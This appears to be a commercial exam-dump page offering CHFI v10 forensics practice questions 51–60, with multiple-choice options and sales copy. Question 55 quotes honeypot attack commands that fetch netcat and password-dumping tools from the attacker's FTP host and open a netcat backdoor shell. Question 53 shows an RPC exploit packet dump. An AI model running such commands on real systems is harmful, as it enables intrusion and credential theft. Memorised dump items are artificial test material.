Pre-Summer Sale Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 65pass65

312-49v10 Computer Hacking Forensic Investigator (CHFI-v10) is now Stable and With Pass Result | Test Your Knowledge for Free

Exams4sure Dumps

312-49v10 Practice Questions

Computer Hacking Forensic Investigator (CHFI-v10)

Last Update 2 days ago
Total Questions : 704

Dive into our fully updated and stable 312-49v10 practice test platform, featuring all the latest CHFI v10 exam questions added this week. Our preparation tool is more than just a ECCouncil study aid; it's a strategic advantage.

Our free CHFI v10 practice questions crafted to reflect the domains and difficulty of the actual exam. The detailed rationales explain the 'why' behind each answer, reinforcing key concepts about 312-49v10. Use this test to pinpoint which areas you need to focus your study on.

312-49v10 PDF

312-49v10 PDF (Printable)
$43.75
$124.99

312-49v10 Testing Engine

312-49v10 PDF (Printable)
$50.75
$144.99

312-49v10 PDF + Testing Engine

312-49v10 PDF (Printable)
$63.7
$181.99
Question # 51

On Linux/Unix based Web servers, what privilege should the daemon service be run under?

Options:

A.  

Guest

B.  

Root

C.  

You cannot determine what privilege runs the daemon service

D.  

Something other than root

Discussion 0
Question # 52

You are called in to assist the police in an investigation involving a suspected drug dealer. The suspects house was searched by the police after a warrant was obtained and they located a floppy disk in the suspects bedroom. The disk contains several files, but they appear to be password protected. What are two common methods used by password cracking software that you can use to obtain the password?

Options:

A.  

Limited force and library attack

B.  

Brute Force and dictionary Attack

C.  

Maximum force and thesaurus Attack

D.  

Minimum force and appendix Attack

Discussion 0
Question # 53

A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker. Given below is an excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by studying the log. Please note that you are required to infer only what is explicit in the excerpt.

(Note: The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.)

03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111

TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF

***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32

TCP Options (3) => NOP NOP TS: 23678634 2878772

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111

UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84

Len: 64

01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ................

00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................

00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................

00 00 00 11 00 00 00 00 ........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773

UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104

Len: 1084

47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8

Options:

A.  

The attacker has conducted a network sweep on port 111

B.  

The attacker has scanned and exploited the system using Buffer Overflow

C.  

The attacker has used a Trojan on port 32773

D.  

The attacker has installed a backdoor

Discussion 0
Question # 54

When investigating a network that uses DHCP to assign IP addresses, where would you look to determine which system (MAC address) had a specific IP address at a specific time?

Options:

A.  

on the individual computer's ARP cache

B.  

in the Web Server log files

C.  

in the DHCP Server log files

D.  

there is no way to determine the specific IP address

Discussion 0
Question # 55

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Short reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CM

D.  

EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"

"cmd1.exe /c echo johna2k >>ftpcom"

"cmd1.exe /c echo haxedj00 >>ftpcom"

"cmd1.exe /c echo get nc.exe >>ftpcom"

"cmd1.exe /c echo get pdump.exe >>ftpcom"

"cmd1.exe /c echo get samdump.dll >>ftpcom"

"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

Options:

A.  

It is a local exploit where the attacker logs in using username johna2k

B.  

There are two attackers on the system - johna2k and haxedj00

C.  

The attack is a remote exploit and the hacker downloads three files

D.  

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Discussion 0
Question # 56

James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network?

Options:

A.  

Smurf

B.  

Trinoo

C.  

Fraggle

D.  

SYN flood

Discussion 0
Question # 57

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer investigators should you request to staff the lab?

Options:

A.  

8

B.  

1

C.  

4

D.  

2

Discussion 0
Question # 58

______allows a forensic investigator to identify the missing links during investigation.

Options:

A.  

Evidence preservation

B.  

Chain of custody

C.  

Evidence reconstruction

D.  

Exhibit numbering

Discussion 0
Question # 59

Which of the following is a requirement for senders as per the CAN-SPAM act?

Options:

A.  

Senders cannot use misleading or false header information

B.  

Senders should never share their physical postal address in the email

C.  

Senders must use deceptive subject lines

D.  

Emails must not contain information regarding how to stop receiving emails from the sender in future

Discussion 0
Question # 60

An EC2 instance storing critical data of a company got infected with malware. The forensics team took the EBS volume snapshot of the affected Instance to perform further analysis and collected other data of evidentiary value. What should be their next step?

Options:

A.  

They should pause the running instance

B.  

They should keep the instance running as it stores critical data

C.  

They should terminate all instances connected via the same VPC

D.  

They should terminate the instance after taking necessary backup

Discussion 0
Get 312-49v10 dumps and pass your exam in 24 hours!

Free Exams Sample Questions